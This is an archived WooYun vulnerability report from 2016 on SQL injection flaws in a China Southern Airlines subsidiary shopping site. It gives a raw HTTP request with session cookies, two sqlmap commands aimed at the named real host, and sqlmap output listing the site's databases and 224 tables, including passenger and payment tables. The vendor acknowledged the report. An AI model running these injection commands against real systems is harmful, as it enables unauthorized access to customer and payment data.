当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0166527

漏洞标题:南航某站SQL注入漏洞打包

相关厂商:中国南方航空股份有限公司

漏洞作者: 路人甲

提交时间:2016-01-01 09:37

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-01: 细节已通知厂商并且等待厂商处理中
2016-01-04: 厂商已经确认,细节仅向厂商公开
2016-01-14: 细节向核心白帽子及相关领域专家公开
2016-01-24: 细节向普通白帽子公开
2016-02-03: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

SQL注入,请修复

详细说明:

注入点一:请求如下

GET /shop/home/merchant.html?navigation_id=&query_value=1&shop_id=1 HTTP/1.1
Referer: http://csair.bluedoor.com.cn:80/
Cookie: PHPSESSID=puaje4o21ispsqe2ubasem0aj0; record_browse_goods_ob=WzYzLDEwOSw5MywxMDYsMTA0LDcwLDY0LDEwOCwxMjhd; JSESSIONID=8AE24271C05633302FDC8FB76E063B97; HMACCOUNT=B83CFD798577A510; Hm_lvt_cbc58f4d53b109e5f36067cf7682b337=1451540719,1451540802,1451540908,1451540938; Hm_lpvt_cbc58f4d53b109e5f36067cf7682b337=1451540938; WT-FPC=id=202.105.41.197-1071687936.30491534:lv=1451540973331:ss=1451540690024:fs=1451540690024:pn=5:vn=1
Host: csair.bluedoor.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


截图:

1.jpg


注入点二:sqlmap.py -u "http://csair.bluedoor.com.cn:80/shop/goods/search.html?brand_id=all&page=2&payment_type=all&price=all&price_orderby=asc&query=1" --dbs --dbms="MySQL" -p query
截图:

2.jpg


注入点三:sqlmap.py -u "http://csair.bluedoor.com.cn:80/shop/index.php/goods/search.html?query=1" --dbs --dbms="MySQL" -p query
截图:

3.jpg


漏洞证明:

数据库:
available databases [3]:
[*] csair
[*] csair_shop
[*] information_schema
[21:24:42] [INFO] fetching tables for database: 'csair'
[21:24:42] [INFO] the SQL query used returns 224 entries
Database: csair
[224 tables]
+-----------------------------------+
| v9_abnormal_log |
| v9_activities |
| v9_activities_address |
| v9_activities_collect |
| v9_activities_comment |
| v9_activities_exchange |
| v9_activities_join |
| v9_activities_photo |
| v9_activities_txt |
| v9_activity |
| v9_activity_goods |
| v9_admin |
| v9_admin_log |
| v9_admin_panel |
| v9_admin_role |
| v9_admin_role_priv |
| v9_adtemplate |
| v9_adtemplate_ad_rotator |
| v9_adtemplate_ad_rotator_image |
| v9_adtemplate_column |
| v9_adtemplate_discount_ticket |
| v9_adtemplate_free_walker |
| v9_adtemplate_get_visa |
| v9_adtemplate_group_buying |
| v9_adtemplate_products_tab |
| v9_adtemplate_products_type |
| v9_adtemplate_rent_car |
| v9_adtemplate_rent_car_image |
| v9_adtemplate_select_hotel |
| v9_adtemplate_select_hotel_image |
| v9_adtemplate_service_products |
| v9_adtemplate_special_supply |
| v9_adtemplate_travel |
| v9_adtemplate_travel_image |
| v9_adtemplate_visa |
| v9_adtemplate_wap |
| v9_adtemplate_wap_products |
| v9_announce |
| v9_area |
| v9_area_image |
| v9_area_image2 |
| v9_area_month_recommend |
| v9_area_region |
| v9_area_region_recommend |
| v9_attachment |
| v9_attachment_index |
| v9_badword |
| v9_block |
| v9_block_history |
| v9_block_priv |
| v9_cache |
| v9_category |
| v9_category_priv |
| v9_check_email |
| v9_collection_content |
| v9_collection_history |
| v9_collection_node |
| v9_collection_program |
| v9_content_check |
| v9_copyfrom |
| v9_datacall |
| v9_dbsource |
| v9_download |
| v9_download_data |
| v9_downservers |
| v9_draw_log |
| v9_edit_orderstart_log |
| v9_email_api_log |
| v9_email_subscription |
| v9_extend_setting |
| v9_favorite |
| v9_flight_api_log |
| v9_flight_order |
| v9_flight_order_flightinfos |
| v9_flight_order_passengerinfo |
| v9_footprint |
| v9_footprint_scenic |
| v9_game |
| v9_game_data |
| v9_hits |
| v9_home_album_category |
| v9_illegal_operation_log |
| v9_img_use |
| v9_integral_log |
| v9_ip_ban |
| v9_ipbanned |
| v9_keylink |
| v9_keyword |
| v9_keyword_data |
| v9_linkage |
| v9_linkman |
| v9_log |
| v9_login_log |
| v9_mail_add |
| v9_member |
| v9_member_active_flag |
| v9_member_blacklist |
| v9_member_checkticket_log |
| v9_member_detail |
| v9_member_exp_log |
| v9_member_follow |
| v9_member_group |
| v9_member_home_album |
| v9_member_home_pic |
| v9_member_journey_story |
| v9_member_journey_story_best |
| v9_member_journey_story_collect |
| v9_member_journey_story_comment |
| v9_member_journey_story_image2 |
| v9_member_journey_story_prize |
| v9_member_journey_story_region |
| v9_member_journey_story_share_log |
| v9_member_journey_story_vote_log |
| v9_member_menu |
| v9_member_verify |
| v9_member_vip |
| v9_member_wallet |
| v9_menu |
| v9_message |
| v9_message_group_user |
| v9_message_shield |
| v9_message_theme |
| v9_model |
| v9_model_field |
| v9_module |
| v9_news |
| v9_news_data |
| v9_not_draw_user |
| v9_opinion |
| v9_order_csair_api_log |
| v9_order_goods |
| v9_order_info |
| v9_order_paybillno_log |
| v9_order_unionpay_api_log |
| v9_order_update_log |
| v9_order_wallet |
| v9_page |
| v9_passenger_info |
| v9_pay_account |
| v9_pay_log |
| v9_pay_of_order |
| v9_pay_payment |
| v9_pay_spend |
| v9_pay_update_log |
| v9_payment_log |
| v9_payment_update_log |
| v9_pd_infos |
| v9_pic_album |
| v9_pic_album_collect |
| v9_pic_album_photo |
| v9_pic_album_photo_address |
| v9_pic_album_photo_comment |
| v9_pic_album_photo_day |
| v9_picture |
| v9_picture_data |
| v9_plan |
| v9_plan_address |
| v9_plan_collect |
| v9_plan_comment |
| v9_plan_day |
| v9_plan_food |
| v9_plan_hotel |
| v9_plan_join |
| v9_plan_scenic |
| v9_plan_traffic |
| v9_position |
| v9_position_data |
| v9_post_orderstart_log |
| v9_poster |
| v9_poster_space |
| v9_product_comment |
| v9_product_likes |
| v9_products |
| v9_products2 |
| v9_products2__sorts |
| v9_products2_deptcitys |
| v9_products2_goodsorts |
| v9_products2_imgs |
| v9_products2_infos |
| v9_products2_schedules |
| v9_products2_stores |
| v9_products2_subjects |
| v9_products_imgs |
| v9_prov_city_area_street |
| v9_queue |
| v9_region |
| v9_region_area |
| v9_register_email_log |
| v9_release_point |
| v9_scenic |
| v9_scenic_image |
| v9_scenic_image2 |
| v9_search |
| v9_search_keyword |
| v9_session |
| v9_set_pd_log |
| v9_share |
| v9_site |
| v9_special |
| v9_special_c_data |
| v9_special_content |
| v9_sphinx_counter |
| v9_sync_logs |
| v9_tab |
| v9_tag |
| v9_template_bak |
| v9_theme |
| v9_theme_city |
| v9_times |
| v9_type |
| v9_update_email_log |
| v9_update_user_log |
| v9_urlrule |
| v9_video |
| v9_video_content |
| v9_video_data |
| v9_video_store |
| v9_wallet_api_log |
| v9_wallet_coupons |
| v9_wallet_coupons_operate_log |
| v9_wallet_get_coupons_log |
| v9_wap_type |
| v9_webservice_log |
| v9_workflow |
+-----------------------------------+

修复方案:

结合业务做修改,你们更专业。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-01-04 00:08

厂商回复:

谢谢报告问题。分子公司的网站需要整合!!

最新状态:

暂无


漏洞评价:

评价